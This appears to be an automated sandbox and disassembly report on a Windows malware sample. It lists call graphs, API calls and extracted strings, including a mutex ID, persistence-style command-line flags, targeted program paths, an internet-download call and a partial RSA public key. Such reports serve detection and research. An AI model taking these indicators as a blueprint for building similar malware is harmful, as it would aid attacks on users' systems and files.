58 API calls 41668->41669 41670 49b302 41669->41670 41790 4942d2 9 API calls __invalid_parameter_noinfo_noreturn 41670->41790 41674 49b347 41672->41674 41681 49b30d 41672->41681 41791 4a8a16 58 API calls __malloc_crt 41672->41791 41675 49816b __fseek_nolock 58 API calls 41674->41675 41676 49b35b 41675->41676 41757 49b4b0 41676->41757 41678 49b362 41679 49816b __fseek_nolock 58 API calls 41678->41679 41678->41681 41680 49b385 41679->41680 41680->41681 41682 49816b __fseek_nolock 58 API calls 41680->41682 41681->41659 41683 49b391 41682->41683 41683->41681 41684 49816b __fseek_nolock 58 API calls 41683->41684 41685 49b39e 41684->41685 41686 49816b __fseek_nolock 58 API calls 41685->41686 41686->41681 41687->41658 41688->41659 41690 49b5e5 41689->41690 41693 49b5fc 41689->41693 41799 4951d4 58 API calls __getptd_noexit 41690->41799 41692 49bd34 41809 4951d4 58 API calls __getptd_noexit 41692->41809 41693->41692 41698 49b636 41693->41698 41695 49b5ea 41697 495208 ___copy_to_char 58 API calls 41695->41697 41696 49bd39 41699 495208 ___copy_to_char 58 API calls 41696->41699 41737 49b5f1 41697->41737 41700 49b63e 41698->41700 41706 49b655 41698->41706 41701 49b64a 41699->41701 41800 4951d4 58 API calls __getptd_noexit 41700->41800 41810 4942d2 9 API calls __invalid_parameter_noinfo_noreturn 41701->41810 41703 49b643 41707 495208 ___copy_to_char 58 API calls 41703->41707 41705 49b66a 41801 4951d4 58 API calls __getptd_noexit 41705->41801 41706->41705 41709 49b684 41706->41709 41710 49b6a2 41706->41710 41706->41737 41707->41701 41709->41705 41714 49b68f 41709->41714 41711 498cde __malloc_crt 58 API calls 41710->41711 41712 49b6b2 41711->41712 41715 49b6ba 41712->41715 41716 49b6d5 41712->41716 41713 4a89c2 __stbuf 58 API calls 41717 49b7a3 41713->41717 41714->41713 41718 495208 ___copy_to_char 58 API calls 41715->41718 41803 49f744 60 API calls 3 library calls 41716->41803 41719 49b81c ReadFile 41717->41719 41724 49b7b9 GetConsoleMode 41717->41724 41721 49b6bf 41718->41721 41722 49bcfc GetLastError 41719->41722 41723 49b83e 41719->41723 41802 4951d4 58 API calls __getptd_noexit 41721->41802 41726 49bd09 41722->41726 41727 49b7fc 41722->41727 41723->41722 41731 49b80e 41723->41731 41728 49b819 41724->41728 41729 49b7cd 41724->41729 41730 495208 ___copy_to_char 58 API calls 41726->41730 41739 49b802 41727->41739 41804 4951e7 58 API calls 3 library calls 41727->41804 41728->41719 41729->41728 41732 49b7d3 ReadConsoleW 41729->41732 41733 49bd0e 41730->41733 41731->41739 41740 49b873 41731->41740 41741 49bae0 41731->41741 41732->41731 41734 49b7f6 GetLastError 41732->41734 41808 4951d4 58 API calls __getptd_noexit 41733->41808 41734->41727 41737->41659 41738 490bed _free 58 API calls 41738->41737 41739->41737 41739->41738 41743 49b8df ReadFile 41740->41743 41748 49b960 41740->41748 41741->41739 41744 49bbe6 ReadFile 41741->41744 41745 49b900 GetLastError 41743->41745 41755 49b90a 41743->41755 41750 49bc09 GetLastError 41744->41750 41756 49bc17 41744->41756 41745->41755 41746 49ba1d 41751 49b9cd MultiByteToWideChar 41746->41751 41806 49f744 60 API calls 3 library calls 41746->41806 41747 49ba0d 41749 495208 ___copy_to_char 58 API calls 41747->41749 41748->41739 41748->41746 41748->41747 41748->41751 41749->41739 41750->41756 41751->41734 41751->41739 41755->41740 41805 49f744 60 API calls 3 library calls 41755->41805 41756->41741 41807 49f744 60 API calls 3 library calls 41756->41807 41758 49b4bc ___BuildCatchObject 41757->41758 41759 49b4c9 41758->41759 41760 49b4e0 41758->41760 41792 4951d4 58 API calls __getptd_noexit 41759->41792 41761 49b5a4 41760->41761 41763 49b4f4 41760->41763 41797 4951d4 58 API calls __getptd_noexit 41761->41797 41766 49b51f 41763->41766 41767 49b512 41763->41767 41765 49b4ce 41769 495208 ___copy_to_char 58 API calls 41765->41769 41771 49b52c 41766->41771 41772 49b541 41766->41772 41793 4951d4 58 API calls __getptd_noexit 41767->41793 41768 49b517 41775 495208 ___copy_to_char 58 API calls 41768->41775 41779 49b4d5 ___BuildCatchObject 41769->41779 41794 4951d4 58 API calls __getptd_noexit 41771->41794 41774 4ab134 ___lock_fhandle 59 API calls 41772->41774 41777 49b547 41774->41777 41778 49b539 41775->41778 41776 49b531 41780 495208 ___copy_to_char 58 API calls 41776->41780 41781 49b55a 41777->41781 41782 49b56d 41777->41782 41798 4942d2 9 API calls __invalid_parameter_noinfo_noreturn 41778->41798 41779->41678 41780->41778 41783 49b5c4 __read_nolock 70 API calls 41781->41783 41785 495208 ___copy_to_char 58 API calls 41782->41785 41786 49b566 41783->41786 41787 49b572 41785->41787 41796 49b59c LeaveCriticalSection __unlock_fhandle 41786->41796 41795 4951d4 58 API calls __getptd_noexit 41787->41795 41790->41681 41791->41674 41792->41765 41793->41768 41794->41776 41795->41786 41796->41779 41797->41768 41798->41779 41799->41695 41800->41703 41801->41703 41802->41737 41803->41714 41804->41739 41805->41755 41806->41751 41807->41756 41808->41739 41809->41696 41810->41737 41814 491ffe ___BuildCatchObject 41811->41814 41812 492010 41813 495208 ___copy_to_char 58 API calls 41812->41813 41815 492015 41813->41815 41814->41812 41816 49203d 41814->41816 41847 4942d2 9 API calls __invalid_parameter_noinfo_noreturn 41815->41847 41818 498df4 __getstream 61 API calls 41816->41818 41819 492042 41818->41819 41820 492058 41819->41820 41821 49204b 41819->41821 41822 492081 41820->41822 41823 492061 41820->41823 41824 495208 ___copy_to_char 58 API calls 41821->41824 41830 49b078 41822->41830 41825 495208 ___copy_to_char 58 API calls 41823->41825 41827 492020 ___BuildCatchObject @_EH4_CallFilterFunc@8 41824->41827 41825->41827 41827->41458 41838 49b095 41830->41838 41831 49b0a9 41832 495208 ___copy_to_char 58 API calls 41831->41832 41833 49b0ae 41832->41833 41852 4942d2 9 API calls __invalid_parameter_noinfo_noreturn 41833->41852 41834 49b2ac 41849 4afba6 41834->41849 41837 49208c 41848 4920ae LeaveCriticalSection LeaveCriticalSection _vwprintf_helper 41837->41848 41838->41831 41846 49b250 41838->41846 41853 4afbc4 58 API calls __mbsnbcmp_l 41838->41853 41840 49b216 41840->41831 41854 4afcf3 65 API calls __mbsnbicmp_l 41840->41854 41842 49b249 41842->41846 41855 4afcf3 65 API calls __mbsnbicmp_l 41842->41855 41844 49b268 41844->41846 41856 4afcf3 65 API calls __mbsnbicmp_l 41844->41856 41846->41831 41846->41834 41847->41827 41848->41827 41857 4afa8f 41849->41857 41851 4afbbf 41851->41837 41852->41837 41853->41840 41854->41842 41855->41844 41856->41846 41860 4afa9b ___BuildCatchObject 41857->41860 41858 4afab1 41859 495208 ___copy_to_char 58 API calls 41858->41859 41861 4afab6 41859->41861 41860->41858 41862 4afae7 41860->41862 41875 4942d2 9 API calls __invalid_parameter_noinfo_noreturn 41861->41875 41868 4afb58 41862->41868 41867 4afac0 ___BuildCatchObject 41867->41851 41877 497970 41868->41877 41870 4afb03 41876 4afb2c LeaveCriticalSection __unlock_fhandle 41870->41876 41872 4abac1 __wsopen_nolock 109 API calls 41873 4afb92 41872->41873 41874 490bed _free 58 API calls 41873->41874 41874->41870 41875->41867 41876->41867 41878 49797d 41877->41878 41879 497993 41877->41879 41880 495208 ___copy_to_char 58 API calls 41878->41880 41879->41878 41881 49799a ___crtIsPackagedApp 41879->41881 41882 497982 41880->41882 41884 4979b0 MultiByteToWideChar 41881->41884 41885 4979a3 AreFileApisANSI 41881->41885 41898 4942d2 9 API calls __invalid_parameter_noinfo_noreturn 41882->41898 41887 4979db 41884->41887 41888 4979ca GetLastError 41884->41888 41885->41884 41886 4979ad 41885->41886 41886->41884 41890 498cde __malloc_crt 58 API calls 41887->41890 41899 4951e7 58 API calls 3 library calls 41888->41899 41892 4979e3 41890->41892 41891 49798c 41891->41870 41891->41872 41892->41891 41893 4979ea MultiByteToWideChar 41892->41893 41893->41891 41894 497a00 GetLastError 41893->41894 41900 4951e7 58 API calls 3 library calls 41894->41900 41896 497a0c 41897 490bed _free 58 API calls 41896->41897 41897->41891 41898->41891 41899->41891 41900->41896 41901->41464 41902->41470 41903->41464 41904->41419 41906 497e1a ___BuildCatchObject 41905->41906 41907 498af7 __lock 51 API calls 41906->41907 41908 497e21 41907->41908 41909 497eda _doexit 41908->41909 41910 497e4f DecodePointer 41908->41910 41925 497f28 41909->41925 41910->41909 41912 497e66 DecodePointer 41910->41912 41918 497e76 41912->41918 41914 497f37 ___BuildCatchObject 41914->39707 41916 497e83 EncodePointer 41916->41918 41917 497f1f 41919 497b0b _doexit 3 API calls 41917->41919 41918->41909 41918->41916 41920 497e93 DecodePointer EncodePointer 41918->41920 41923 497ea5 DecodePointer DecodePointer 41918->41923 41921 497f28 41919->41921 41920->41918 41922 497f35 41921->41922 41930 498c81 LeaveCriticalSection 41921->41930 41922->39707 41923->41918 41926 497f2e 41925->41926 41927 497f08 41925->41927 41931 498c81 LeaveCriticalSection 41926->41931 41927->41914 41929 498c81 LeaveCriticalSection 41927->41929 41929->41917 41930->41922 41931->41927 41932 4940f6 41933 4940b0 41932->41933 41934 49403b 41933->41934 41935 4940b2 41933->41935 41939 4a21a1 __wsetenvp 58 API calls 41934->41939 41936 494090 41935->41936 41937 4940b4 41935->41937 41956 497c59 58 API calls _doexit 41936->41956 41938 4940c0 41937->41938 41957 497cec 58 API calls _doexit 41937->41957 41958 497c4a 58 API calls _doexit 41938->41958 41943 49404f 41939->41943 41944 49405a 41943->41944 41954 497c2e 58 API calls 3 library calls 41943->41954 41945 497c68 __cinit 68 API calls 41944->41945 41949 494062 41945->41949 41947 494095 ___BuildCatchObject 41948 49406d __wwincmdln 41951 489f90 605 API calls 41948->41951 41949->41948 41955 497c2e 58 API calls 3 library calls 41949->41955 41952 494081 41951->41952 41952->41936 41953 497f3d 58 API calls 41952->41953 41953->41936 41956->41947 41957->41938 41958->41947 41959 4f1920 41960 49f7c0 __ftell_nolock 41959->41960 41961 4f1943 GetVersionExA LoadLibraryA LoadLibraryA LoadLibraryA 41960->41961 41962 4f1a0b 41961->41962 41963 4f19e2 GetProcAddress GetProcAddress 41961->41963 41964 4f1aab 41962->41964 41967 4f1a1b NetStatisticsGet 41962->41967 41963->41962 41965 4f1acb 41964->41965 41966 4f1ac4 FreeLibrary 41964->41966 41968 4f1ad5 GetProcAddress GetProcAddress GetProcAddress 41965->41968 41994 4f1b0d __ftell_nolock 41965->41994 41966->41965 41969 4f1a69 NetStatisticsGet 41967->41969 41970 4f1a33 __ftell_nolock 41967->41970 41968->41994 41969->41964 41971 4f1a87 __ftell_nolock 41969->41971 41975 4cd550 101 API calls 41970->41975 41977 4cd550 101 API calls 41971->41977 41972 4f1bee 41973 4f1c1b 41972->41973 41974 4f1c14 FreeLibrary 41972->41974 41978 4f1c24 41973->41978 41979 4f1c31 LoadLibraryA 41973->41979 41974->41973 41976 4f1a5a 41975->41976 41976->41969 41977->41964 42059 4c49a0 13 API calls 4 library calls 41978->42059 41980 4f1d4b 41979->41980 41981 4f1c4a GetProcAddress GetProcAddress GetProcAddress 41979->41981 41983 4f223f 41980->41983 41984 4f1d59 12 API calls 41980->41984 41992 4f1c84 __ftell_nolock 41981->41992 41998 4f1cac __ftell_nolock 41981->41998 42047 4f2470 41983->42047 41986 4f1e5c 41984->41986 41987 4f2233 FreeLibrary 41984->41987 41985 4f1c29 41985->41979 41985->41980 41986->41987 42008 4f1ed9 CreateToolhelp32Snapshot 41986->42008 41987->41983 41990 4f1d3f FreeLibrary 41990->41980 41991 4f225b __ftell_nolock 41993 4cd550 101 API calls 41991->41993 41995 4cd550 101 API calls 41992->41995 41997 4f2276 GetCurrentProcessId 41993->41997 41994->41972 42000 4cd550 101 API calls 41994->42000 42004 4f1b7c __ftell_nolock 41994->42004 41995->41998 41996 4f1d03 __ftell_nolock 41996->41990 42001 4cd550 101 API calls 41996->42001 41999 4f228f __ftell_nolock 41997->41999 41998->41996 42003 4cd550 101 API calls 41998->42003 42005 4cd550 101 API calls 41999->42005 42000->42004 42002 4f1d3c 42001->42002 42002->41990 42003->41996 42004->41972 42006 4cd550 101 API calls 42004->42006 42007 4f22aa 42005->42007 42006->41972 42009 49a77e __getch_nolock 6 API calls 42007->42009 42008->41987 42010 4f1ef0 42008->42010 42011 4f22ca 42009->42011 42012 4f1f15 Heap32ListFirst 42010->42012 42013 4f1f03 GetTickCount 42010->42013 42014 4f2081 42012->42014 42019 4f1f28 __ftell_nolock 42012->42019 42013->42012 42015 4f209d Process32First 42014->42015 42016 4f2095 GetTickCount 42014->42016 42017 4f210a 42015->42017 42020 4f20b4 __ftell_nolock 42015->42020 42016->42015 42018 4f2118 GetTickCount 42017->42018 42032 4f2120 __ftell_nolock 42017->42032 42018->42032 42019->42014 42026 4f204e Heap32ListNext 42019->42026 42027 4f2066 GetTickCount 42019->42027 42030 4cd550 101 API calls 42019->42030 42038 4f1ff1 GetTickCount 42019->42038 42041 4cd550 42019->42041 42020->42017 42023 4cd550 101 API calls 42020->42023 42031 4f20fb GetTickCount 42020->42031 42022 4f1f56 Heap32First 42022->42019 42023->42020 42024 4f2196 42025 4f21a4 GetTickCount 42024->42025 42036 4f21ac __ftell_nolock 42024->42036 42025->42036 42026->42014 42026->42019 42027->42014 42027->42019 42028 4f2219 42034 4f222d CloseHandle 42028->42034 42035 4f2229 42028->42035 42029 4cd550 101 API calls 42029->42032 42033 4f1fd9 Heap32Next 42030->42033 42031->42017 42031->42020 42032->42024 42032->42029 42039 4f2187 GetTickCount 42032->42039 42033->42019 42034->41987 42035->41987 42036->42028 42037 4cd550 101 API calls 42036->42037 42040 4f220a GetTickCount 42036->42040 42037->42036 42038->42019 42039->42024 42039->42032 42040->42028 42040->42036 42042 4cd559 42041->42042 42045 4cd57d __ftell_nolock 42041->42045 42060 4db5d0 101 API calls __except_handler4 42042->42060 42044 4cd55f 42044->42045 42061 4ca5e0 101 API calls __except_handler4 42044->42061 42045->42022 42048 4f247a __ftell_nolock 42047->42048 42049 4f24c3 GetTickCount 42048->42049 42050 4f2483 QueryPerformanceCounter 42048->42050 42051 4f24d6 __ftell_nolock 42049->42051 42052 4f2499 __ftell_nolock 42050->42052 42053 4f2492 42050->42053 42054 4cd550 101 API calls 42051->42054 42055 4cd550 101 API calls 42052->42055 42053->42049 42056 4f24ea 42054->42056 42057 4f24b7 42055->42057 42058 4f2244 GlobalMemoryStatus 42056->42058 42057->42049 42057->42058 42058->41991 42059->41985 42060->42044 42061->42045
                                                                                                  APIs
                                                                                                    • Part of subcall function 0047CF10: _memset.LIBCMT ref: 0047CF4A
                                                                                                    • Part of subcall function 0047CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0047CF5F
                                                                                                    • Part of subcall function 0047CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0047CFA6
                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00489FC4
                                                                                                  • GetLastError.KERNEL32 ref: 00489FD2
                                                                                                  • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00489FDA
                                                                                                  • GetLastError.KERNEL32 ref: 00489FE4
                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,0132B268,?), ref: 0048A0BB
                                                                                                  • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0048A0C2
                                                                                                  • GetCommandLineW.KERNEL32(?,?), ref: 0048A161
                                                                                                    • Part of subcall function 004824E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004824FE
                                                                                                    • Part of subcall function 004824E0: GetLastError.KERNEL32 ref: 00482509
                                                                                                    • Part of subcall function 004824E0: CloseHandle.KERNEL32 ref: 0048251C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                                                                                                  • String ID: IsNotAutoStart$ IsNotTask$%username%$-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA50iTgpK4WqHRCxsCP+Ko\\ni6Rfb9WWM4K\/vgKVvZi\/+pA7wR6QvFBU$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1W$list<T> too long$x*W$x2X${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7W
                                                                                                  • API String ID: 2957410896-3042617325
                                                                                                  • Opcode ID: f89de352c4db7fa4a9ff20c5a0a66436c87aca2fb3f725aff05924ad08edf5f8
                                                                                                  • Instruction ID: 7c77ac030df5990d22bab2936d870a768b18eed89333484258f6b1a69eea9d5c
                                                                                                  • Opcode Fuzzy Hash: f89de352c4db7fa4a9ff20c5a0a66436c87aca2fb3f725aff05924ad08edf5f8
                                                                                                  • Instruction Fuzzy Hash: 92D2D370504341ABDB14FF24C845B9F7BE4BF94708F004D2EF48597292EBB9A909DB9A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 606 4f1920-4f19e0 call 49f7c0 GetVersionExA LoadLibraryA * 3 609 4f1a0b-4f1a0d 606->609 610 4f19e2-4f1a05 GetProcAddress * 2 606->610 611 4f1aba-4f1ac2 609->611 612 4f1a13-4f1a15 609->612 610->609 613 4f1acb-4f1ad3 611->613 614 4f1ac4-4f1ac5 FreeLibrary 611->614 612->611 615 4f1a1b-4f1a31 NetStatisticsGet 612->615 616 4f1b0d 613->616 617 4f1ad5-4f1b0b GetProcAddress * 3 613->617 614->613 618 4f1a69-4f1a85 NetStatisticsGet 615->618 619 4f1a33-4f1a5d call 49f7c0 call 4cd550 615->619 621 4f1b0f-4f1b17 616->621 617->621 618->611 620 4f1a87-4f1aae call 49f7c0 call 4cd550 618->620 619->618 620->611 625 4f1b1d-4f1b23 621->625 626 4f1c0a-4f1c12 621->626 625->626 627 4f1b29-4f1b2b 625->627 629 4f1c1b-4f1c22 626->629 630 4f1c14-4f1c15 FreeLibrary 626->630 627->626 633 4f1b31-4f1b42 627->633 635 4f1c24-4f1c2b call 4c49a0 629->635 636 4f1c31-4f1c44 LoadLibraryA 629->636 630->629 644 4f1b45-4f1b47 633->644 635->636 637 4f1d4b-4f1d53 635->637 636->637 638 4f1c4a-4f1c82 GetProcAddress * 3 636->638 641 4f223f-4f2256 call 4f2470 GlobalMemoryStatus call 49f7c0 637->641 642 4f1d59-4f1e56 GetProcAddress * 12 637->642 645 4f1caf-4f1cb7 638->645 646 4f1c84 638->646 669 4f225b-4f22cd call 4cd550 GetCurrentProcessId call 49f7c0 call 4cd550 call 49a77e 641->669 647 4f1e5c-4f1e63 642->647 648 4f2233-4f2239 FreeLibrary 642->648 650 4f1b49-4f1b5d 644->650 651 4f1b98-4f1bb4 644->651 652 4f1cb9-4f1cc0 645->652 653 4f1d06-4f1d08 645->653 656 4f1c86-4f1cac call 49f7c0 call 4cd550 646->656 647->648 654 4f1e69-4f1e70 647->654 648->641 670 4f1b5f-4f1b84 call 49f7c0 call 4cd550 650->670 671 4f1b8a-4f1b8c 650->671 651->626 667 4f1bb6-4f1bca 651->667 659 4f1ccb-4f1ccd 652->659 660 4f1cc2-4f1cc9 652->660 657 4f1d3f-4f1d45 FreeLibrary 653->657 658 4f1d0a-4f1d3c call 49f7c0 call 4cd550 653->658 654->648 662 4f1e76-4f1e7d 654->662 656->645 657->637 658->657 659->653 666 4f1ccf-4f1cde 659->666 660->653 660->659 662->648 668 4f1e83-4f1e8a 662->668 666->653 680 4f1ce0-4f1d03 call 49f7c0 call 4cd550 666->680 688 4f1bfc-4f1bfe 667->688 689 4f1bcc-4f1bf6 call 49f7c0 call 4cd550 667->689 668->648 675 4f1e90-4f1e97 668->675 670->671 671->651 675->648 682 4f1e9d-4f1ea4 675->682 680->653 682->648 690 4f1eaa-4f1eb1 682->690 688->626 689->688 690->648 696 4f1eb7-4f1ebe 690->696 696->648 702 4f1ec4-4f1ecb 696->702 702->648 706 4f1ed1-4f1ed3 702->706 706->648 709 4f1ed9-4f1eea CreateToolhelp32Snapshot 706->709 709->648 711 4f1ef0-4f1f01 709->711 713 4f1f15-4f1f22 Heap32ListFirst 711->713 714 4f1f03-4f1f0f GetTickCount 711->714 715 4f1f28-4f1f2d 713->715 716 4f2081-4f2093 713->716 714->713 717 4f1f33-4f1f9d call 49f7c0 call 4cd550 Heap32First 715->717 718 4f209d-4f20b2 Process32First 716->718 719 4f2095-4f2097 GetTickCount 716->719 734 4f1f9f-4f1faa 717->734 735 4f2015-4f2060 Heap32ListNext 717->735 721 4f210a-4f2116 718->721 722 4f20b4-4f20f5 call 49f7c0 call 4cd550 718->722 719->718 723 4f2118-4f211a GetTickCount 721->723 724 4f2120-4f2135 721->724 722->721 751 4f20f7-4f20f9 722->751 723->724 732 4f2137 724->732 733 4f2196-4f21a2 724->733 740 4f2140-4f2181 call 49f7c0 call 4cd550 732->740 737 4f21ac-4f21c1 733->737 738 4f21a4-4f21a6 GetTickCount 733->738 741 4f1fb0-4f1feb call 49f7c0 call 4cd550 Heap32Next 734->741 735->716 742 4f2062-4f2064 735->742 752 4f2219-4f2227 737->752 753 4f21c3-4f2204 call 49f7c0 call 4cd550 737->753 738->737 740->733 771 4f2183-4f2185 740->771 763 4f200f 741->763 764 4f1fed-4f1fef 741->764 746 4f2079-4f207b 742->746 747 4f2066-4f2077 GetTickCount 742->747 746->716 746->717 747->716 747->746 751->722 756 4f20fb-4f2108 GetTickCount 751->756 760 4f222d CloseHandle 752->760 761 4f2229-4f222b 752->761 753->752 774 4f2206-4f2208 753->774 756->721 756->722 760->648 761->648 763->735 768 4f2004-4f200d 764->768 769 4f1ff1-4f2002 GetTickCount 764->769 768->741 768->763 769->763 769->768 771->740 772 4f2187-4f2194 GetTickCount 771->772 772->733 772->740 774->753 775 4f220a-4f2217 GetTickCount 774->775 775->752 775->753
                                                                                                  APIs
                                                                                                  • GetVersionExA.KERNEL32(00000094), ref: 004F1983
                                                                                                  • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 004F1994
                                                                                                  • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004F19A1
                                                                                                  • LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 004F19AE
                                                                                                  • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 004F19E8
                                                                                                  • GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 004F19FB
                                                                                                  • NetStatisticsGet.NETAPI32(00000000,LanmanWorkstation,00000000,00000000,?), ref: 004F1A2D
                                                                                                  • NetStatisticsGet.NETAPI32(00000000,LanmanServer,00000000,00000000,?), ref: 004F1A81
                                                                                                  • FreeLibrary.KERNEL32(?), ref: 004F1AC5
                                                                                                  • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 004F1ADB
                                                                                                  • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 004F1AEE
                                                                                                  • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 004F1B01
                                                                                                  • FreeLibrary.KERNEL32(?), ref: 004F1C15
                                                                                                  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 004F1C36
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 004F1C50
                                                                                                  • GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 004F1C63
                                                                                                  • GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 004F1C76
                                                                                                  • FreeLibrary.KERNEL32(?), ref: 004F1D45
                                                                                                  • GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 004F1D73
                                                                                                  • GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 004F1D86
                                                                                                  • GetProcAddress.KERNEL32(?,Heap32First), ref: 004F1D99
                                                                                                  • GetProcAddress.KERNEL32(?,Heap32Next), ref: 004F1DAC
                                                                                                  • GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 004F1DBF
                                                                                                  • GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 004F1DD2
                                                                                                  • GetProcAddress.KERNEL32(?,Process32First), ref: 004F1DE5
                                                                                                  • GetProcAddress.KERNEL32(?,Process32Next), ref: 004F1DF8
                                                                                                  • GetProcAddress.KERNEL32(?,Thread32First), ref: 004F1E0B
                                                                                                  • GetProcAddress.KERNEL32(?,Thread32Next), ref: 004F1E1E
                                                                                                  • GetProcAddress.KERNEL32(?,Module32First), ref: 004F1E31
                                                                                                  • GetProcAddress.KERNEL32(?,Module32Next), ref: 004F1E44
                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 004F1EDD
                                                                                                  • GetTickCount.KERNEL32 ref: 004F1F03
                                                                                                  • Heap32ListFirst.KERNEL32(00000000,00000010), ref: 004F1F1A
                                                                                                  • Heap32First.KERNEL32(00000024,?,?), ref: 004F1F95
                                                                                                  • Heap32Next.KERNEL32(?,?,?,?,?,C624BD34), ref: 004F1FE3
                                                                                                  • GetTickCount.KERNEL32 ref: 004F1FF1
                                                                                                  • Heap32ListNext.KERNEL32(?,?), ref: 004F2058
                                                                                                  • GetTickCount.KERNEL32 ref: 004F2066
                                                                                                  • GetTickCount.KERNEL32 ref: 004F2095
                                                                                                  • Process32First.KERNEL32(?,00000128), ref: 004F20AA
                                                                                                  • GetTickCount.KERNEL32 ref: 004F20FB
                                                                                                  • GetTickCount.KERNEL32 ref: 004F2118
                                                                                                  • GetTickCount.KERNEL32 ref: 004F2187
                                                                                                  • GetTickCount.KERNEL32 ref: 004F21A4
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$CountTick$Library$Heap32Load$FirstFree$ListNextStatistics$CreateProcess32SnapshotToolhelp32Version
                                                                                                  • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
                                                                                                  • API String ID: 4174345323-1723836103
